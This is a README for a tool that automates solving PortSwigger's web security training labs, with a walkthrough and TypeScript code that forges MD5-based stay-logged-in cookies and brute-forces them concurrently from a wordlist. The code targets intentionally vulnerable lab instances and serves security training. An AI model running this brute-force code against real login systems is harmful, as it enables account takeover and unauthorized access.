PortSwigger Labs

PortSwigger Labs - Automation of solving PortSwigger's web security labs.

Automated Labs

Authentication

Cross-site request forgery (CSRF)

Cross-site scripting (XSS)

JWT (JSON Web Token) attacks

More to come...

Installation

The project requires Node.js. The preferred Node.js version is pinned in the .node-version file; Fast Node Manager (fnm) reads that file and can switch to the right version for you.

Install dependencies from the project's root folder:

npm install

Usage

Run each lab with tsx:

$ npx tsx .\lab.ts

Each lab supports a command-line interface with the -h or --help option, which shows you how to use the lab and available options.

For example:

$ portswigger_labs\src\labs\authentication\brute_forcing_a_stay_logged_in_cookie> npx tsx .\lab.ts --help
Usage: lab [options] <url>

Lab: Brute-forcing a stay-logged-in cookie

Arguments:
  url                         lab url, https only (e.g. 'https://0a1000e403.web-security-academy.net')

Options:
  -p, --proxy                 use proxy from the config (default: false)
  -c, --concurrency <number>  concurrency limit (default: 5)
  -h, --help                  display help for command

-p, --proxy Option: What's Happening Behind the Scenes

Type: boolean
Default: false

Route all lab traffic through the proxy defined in the config file.

This lets you see exactly what happens during the lab execution: which requests are sent and which responses come back. It is particularly useful for understanding how a lab is solved.

Before using this option, make sure a proxy is running. Tested with mitmproxy (specifically mitmweb) and Burp Suite's built-in proxy (with "Support invisible proxying" enabled on the listener). Because lab URLs are HTTPS only, an intercepting proxy terminates TLS with its own certificate; if requests fail with a certificate error, export the proxy's CA certificate and point Node.js at it with the NODE_EXTRA_CA_CERTS environment variable.

Note

It is possible to run a lab with the proxy enabled and a concurrency greater than 1, but there is no reason to: interleaved traffic makes it hard to tell which requests and responses belong to which concurrent task. When you use --proxy, set --concurrency to 1.

The default is false: the lab uses no proxy and sends all requests directly.

The proxy configuration is defined in the proxy.json file, with the following default values:

{
  "protocol": "https",
  "host": "127.0.0.1",
  "port": 8080
}

-c, --concurrency <number> Option

Type: number
Default: 5

Set the maximum number of tasks that run concurrently during the lab execution.

In this context, a task is a distinct execution flow with its own set of requests and responses. For example, the "Brute-forcing a stay-logged-in cookie" lab supports concurrency, and setting --concurrency to 2 means that at most 2 tasks run at the same time.

Note

The --concurrency option limits concurrent tasks, not concurrent requests. A single task may itself issue one or more concurrent requests.

To find out if the lab supports concurrent tasks, invoke the lab with the --help option.

Let's Hack the Site: Walkthrough Example

We will walk through solving the Brute-forcing a stay-logged-in cookie lab.

  1. Open the lab link. Here you can read about the lab and what is needed to solve it.
  2. Press the "Access the lab" button. A new browser window opens with a fresh instance of the vulnerable site.
  3. Copy the site's URL. It will look something like https://0ade00bd03624ce5828b88b1001a0082.web-security-academy.net/
  4. Open a terminal window and navigate to the brute_forcing_a_stay_logged_in_cookie lab folder.
  5. Run the lab with that URL:
$ portswigger_labs\src\labs\authentication\brute_forcing_a_stay_logged_in_cookie> npx tsx .\lab.ts https://0ade00bd03624ce5828b88b1001a0082.web-security-academy.net/
12345678: fail
123456: fail
password: fail
...
michelle: fail
computer: fail
jessica: success
Login with username "carlos" and password "jessica" to solve the lab
  6. After lab.ts finishes, follow the instructions it prints to complete the final steps.
  7. Go to the My account page and log in with the provided username and password.

Note

lab.ts doesn't fully solve the lab automatically. This is intentional, so that you perform the final steps yourself.

  8. That's it! ✨ You've successfully hacked the site, and it should indicate that you've solved the lab.
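To make the walkthrough concrete, here is an added example (not code from this repository) of the two pieces the run above relies on: how the lab's stay-logged-in cookie is built, and how a bounded number of concurrent tasks work through a wordlist, matching the --concurrency semantics described earlier. The cookie format, base64(username + ":" + md5(password)), is what the PortSwigger lab uses; the sample wordlist, the fakeLabProbe stand-in, and the assumption that a live lab answers /my-account with 200 for a valid cookie and a redirect otherwise are constructed for this example.

```typescript
import { createHash } from "node:crypto";

// The lab's stay-logged-in cookie is base64(username + ":" + md5(password)).
export function md5Hex(input: string): string {
  return createHash("md5").update(input).digest("hex");
}

export function buildStayLoggedInCookie(username: string, password: string): string {
  return Buffer.from(`${username}:${md5Hex(password)}`).toString("base64");
}

// Decode a captured cookie; returns null if it does not have the expected shape.
export function decodeStayLoggedInCookie(
  cookie: string,
): { username: string; passwordMd5: string } | null {
  const decoded = Buffer.from(cookie, "base64").toString("utf8");
  const sep = decoded.indexOf(":");
  if (sep < 0) return null;
  const hash = decoded.slice(sep + 1);
  return /^[0-9a-f]{32}$/.test(hash) ? { username: decoded.slice(0, sep), passwordMd5: hash } : null;
}

// A probe answers "does this cookie log us in?". One candidate password is one task.
export type Probe = (cookie: string) => Promise<boolean>;

// Work through the wordlist with at most `concurrency` tasks in flight; stop once a hit is found.
export async function bruteForceCookie(
  username: string,
  candidates: readonly string[],
  probe: Probe,
  concurrency = 5,
  onResult?: (password: string, ok: boolean) => void,
): Promise<string | null> {
  let next = 0;
  let found: string | null = null;
  const worker = async (): Promise<void> => {
    while (found === null && next < candidates.length) {
      const password = candidates[next++];
      const ok = await probe(buildStayLoggedInCookie(username, password));
      onResult?.(password, ok);
      if (ok && found === null) found = password;
    }
  };
  await Promise.all(Array.from({ length: Math.max(1, concurrency) }, () => worker()));
  return found;
}

// Probe for a live lab instance (assumption: /my-account answers 200 with a valid cookie
// and redirects to the login page otherwise). Not used by the offline demo below.
export function liveLabProbe(labUrl: string): Probe {
  const base = labUrl.replace(/\/+$/, "");
  return async (cookie) => {
    const res = await fetch(`${base}/my-account`, {
      headers: { Cookie: `stay-logged-in=${cookie}` },
      redirect: "manual",
    });
    return res.status === 200;
  };
}

// Constructed stand-in for the lab so the example runs offline: it knows the real password
// and accepts only the cookie derived from it, after a tiny artificial delay.
export function fakeLabProbe(realUsername: string, realPassword: string): Probe {
  const expected = buildStayLoggedInCookie(realUsername, realPassword);
  return async (cookie) => {
    await new Promise((resolve) => setTimeout(resolve, 1));
    return cookie === expected;
  };
}

// Constructed sample wordlist (a handful of entries in the style of the lab's list).
export const SAMPLE_WORDLIST: readonly string[] = [
  "12345678", "123456", "password", "michelle", "computer", "jessica",
];

// Mirrors the output of the walkthrough: one line per candidate, then the hit.
export async function demo(concurrency = 2): Promise<string | null> {
  const hit = await bruteForceCookie("carlos", SAMPLE_WORDLIST, fakeLabProbe("carlos", "jessica"),
    concurrency, (password, ok) => console.log(`${password}: ${ok ? "success" : "fail"}`));
  if (hit !== null) console.log(`Login with username "carlos" and password "${hit}" to solve the lab`);
  return hit;
}
```

With a concurrency above 1 the per-candidate lines can print out of wordlist order, which is exactly why the proxy section recommends --concurrency 1 when you want to read the traffic. To run against a real instance, swap fakeLabProbe for liveLabProbe(labUrl).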

Walkthrough showcase

Credits

jwt.secrets.list is taken from this repository

derive_public_key.py is a modified version of jwt_forgery.py